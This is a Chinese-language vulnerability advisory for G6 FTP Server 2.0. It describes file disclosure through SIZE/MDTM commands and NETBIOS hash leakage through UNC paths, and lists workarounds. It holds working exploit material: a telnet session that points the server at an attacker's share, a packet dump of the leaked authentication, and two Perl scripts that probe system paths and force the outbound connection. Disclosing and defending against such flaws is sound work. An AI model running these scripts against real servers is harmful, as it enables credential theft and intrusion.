G6 FTP存在文件被泄露和NETBIOS HASH可获得漏洞发布时间:2001-04-05 更新时间:2001-04-05 严重程度:高 威胁程度:口令恢复 错误类型:设计错误 利用方式:服务器模式 受影响系统 G6 FTP Server version 2.0详细描述 Gene6's G6 FTP Server (http://www.gene6.com/)对访问FTP ROOT目录 外的文件没有很好的限制,使用'size'和'mdtm'命令可以收集系统的目录 结构。许多软件一般在产品中会使能网络能力并共享资源,它们使用了 universal naming convention (UNC) 路径来访问机器间的资源和文件, 但对安全没有很好的审核。G6 FTP服务器也允许使用universal naming convention (UNC) paths,通过请求外在共享的大小或者修改时间的属性, 使用FTP服务可以迫使服务产生外出的NETBIOS连接,当服务程序连接远程 主机来收集文件信息,运行服务器的用户的信任信息会传递给远程主机 进行认证,在这个时候可以通过嗅探程序来获得NETBIOS HASH,再使用 类似'L0phtcrack'的工具来解密。 如下所示: Ftp server = 10.1.1.13 Attacker = 10.1.1.11 <----------begin screen dump----------> rob@testbox:~$ telnet 10.1.1.13 21 Trying 10.1.1.13... Connected to 10.1.1.13. Escape character is '^]'. 220 Test server by G6 FTP Server ready ... USER G6 331 Password required for whitey. PASS test 230 User G6 logged in. SIZE \\10.1.1.11\share\evil.txt 213 0 <----------end screen dump----------> 下面是捕获的信息包: <----------begin packet dump----------> 00000030 FF 53 4D 42 73 00 .SMBs. 00000040 00 00 00 18 07 C8 00 00 00 00 00 00 00 00 00 00 ................ 00000050 00 00 00 00 FF FE 00 00 80 00 0D 75 00 E8 00 04 ...........u.... 00000060 11 32 00 01 00 00 00 00 00 18 00 18 00 00 00 00 .2.............. 00000070 00 D4 00 00 00 AB 00 19 ED E4 2F 4D 1A 46 D2 BB ........../M.F.. 00000080 00 BF 62 1F 93 71 E7 17 4E D0 63 81 88 B2 17 77 ..b..q..N.c....w 00000090 9C 73 4D 74 88 67 63 80 50 30 26 63 1F 6B A8 D3 .sMt.gc.P0&c.k.. 000000A0 3D 70 36 20 00 C4 B0 00 41 00 64 00 6D 00 69 00 =p6.....A.d.m.i. 000000B0 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 n.i.s.t.r.a.t.o. 000000C0 72 00 00 00 56 00 49 00 43 00 54 00 49 00 4D 00 r...V.I.C.T.I.M. 000000D0 48 00 4F 00 53 00 54 00 00 00 57 00 69 00 6E 00 H.O.S.T...W.i.n. 000000E0 64 00 6F 00 77 00 73 00 20 00 32 00 30 00 30 00 d.o.w.s...2.0.0. 000000F0 30 00 20 00 32 00 31 00 39 00 35 00 00 00 57 00 0...2.1.9.5...W. 00000100 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 32 00 i.n.d.o.w.s...2. 00000110 30 00 30 00 30 00 20 00 35 00 2E 00 30 00 00 00 0.0.0...5...0... 00000120 00 00 04 FF 00 1E 01 08 00 01 00 2B 00 00 5C 00 ...........+..\. 00000130 5C 00 31 00 30 00 2E 00 31 00 2E 00 31 00 2E 00 \.1.0...1...1... 00000140 31 00 31 00 5C 00 53 00 48 00 41 00 52 00 45 00 1.1.\.S.H.A.R.E. 00000150 00 00 3F 3F 3F 3F 3F 00 ..?????. <----------end packet dump----------> 测试代码 临时解决方案: 1)在服务器配置中设置'show relative paths' 选项(Setup->Main->Options menu). 2)在主机上关闭外部接口卡的NETBIOS协议。 3)如果远程共享是必须的,改变第一项的配置,映射远程资源为本地虚拟驱动盘。 解决方案 下面的脚本会在注册表中搜寻通常的盘符和目录: <----------begin example script g6-find.pl----------> #!/usr/bin/perl # g6-find.pl # example G6 Ftp Server file disclosure vulnerability script use Getopt::Std; use IO::Socket; getopts('h:l:p:',\%args); my ($CRLF,$port,$login,$pass,$sock_res,$win_base,$iis_base,@drives); $CRLF = "\015\012"; @drives = ("c","d","e","f"); $port = 21; $login = 'anonymous'; $pass = 'user@myhost.com'; if (defined $args{h}) { $host = $args{h}; } else { print "No host specified.\n"; exit; } if (defined $args{l}) { $login = $args{l}; } if (defined $args{p}) { $pass = $args{p}; } $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>$port) || die("Socket errors: $!"); $sock_res = <$sock>; print $sock "USER $login" . $CRLF; $sock_res = <$sock>; print $sock "PASS $pass" . $CRLF; $sock_res = <$sock>; if ($sock_res !~ /230\s/) { print "Login/password not accepted...exiting.\n"; close($sock); exit; } print $sock "PWD" . $CRLF; $sock_res = <$sock>; if (lc($sock_res) !~ /\/[a-z][:]\//) { print "Looks like 'show relative path' is enabled...exiting.\n";close($sock);exit;} print "Attempting to locate system files..."; $win_base = &FindWindows; $iis_base = &FindIIS; print "done.\n\n"; close($sock); print "Windows directory: $win_base\n"; print "Hints to IIS path: $iis_base\n"; exit; sub FindWindows { my @win_dirs = ("win","windows","winnt","winme"); foreach $drive (@drives) { foreach $dir (@win_dirs) { print "."; print $sock "SIZE /$drive:/$dir/regedit.exe" . $CRLF; $sock_res = <$sock>; if ($sock_res =~ /213\s/) { return("$drive:\\$dir");} } } return("not found"); } sub FindIIS { my @iis_files = ("Inetpub/wwwroot/_vti_inf.html","Inetpub/Adminscripts/adsutil.vbs","Inetpub/wwwroot/default.asp"); foreach $drive (@drives) { foreach $file (@iis_files) { print "."; print $sock "SIZE /$drive:/$file" . $CRLF; $sock_res = <$sock>; if ($sock_res =~ /213\s/) { $file =~ s/\//\\/g; return("$drive:\\$file"); } } } return("not found"); } <----------end example script g6-find.pl----------> This script demonstrates how to make the G6 ftp server attempt to authenticate against a given host with its current credential set. <----------begin example script g6-2nbt.pl----------> #!/usr/bin/perl # G6-2nbt.pl - example G6 ftp server netbios connection script # # Tested on win32 and Linux, Linux requires share name to be in # the format: \\\\host\\share\\path or //host/share/path use Getopt::Std; use IO::Socket; my($host,$login,$pass,$share,$CRLF,$result); $CRLF = "\015\012"; getopts('h:l:p:s:',\%args); if (!defined $args{h}){ print "No host specified.\n";exit;}else{$host = $args{h};} if (!defined $args{s}){ print "No share specified.\n";exit;}else{$share = $args{s};} if (!defined $args{l} || !defined $args{p}){($login,$pass) = ('anonymous','user@myhost.com');} else { ($login,$pass) = ($args{l},$args{p});} $our_sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>21)|| die("Socket problems."); print "Connected!\n"; print "Login..."; print $our_sock "USER $login" . $CRLF; $result = <$our_sock>; if ($result !~ /331\s/) { print "User name not accepted or an error occurred...exiting.\n";close($our_sock);exit; } print "good.\nPass...."; print $our_sock "PASS $pass" . $CRLF; $result = <$our_sock>; if ($result !~ /230\s/) { if ($result =~ /530\s/) { print "Login/password incorrect exiting.\n";close($our_sock);exit; } else { print "Login failure..exiting.\n";close($our_sock);exit; }} print "good.\nTesting path type..."; print $our_sock "PWD" . $CRLF; $result = <$our_sock>; $result = <$our_sock>; if (lc($result) !~ /\/[a-z][:]\//) { print "Looks like 'show relative path' is enabled...exiting.\n";close($our_sock);exit;} print "not relative path.\nSending UNC to connect to..."; print $our_sock "SIZE $share" . $CRLF; print "completed.\nCheck your logs.\n"; close($our_sock); exit; <----------end example script g6-2nbt.pl----------> 相关信息 此信息有at stake advisories(advisories at ATSTAKE.COM)发布。 |
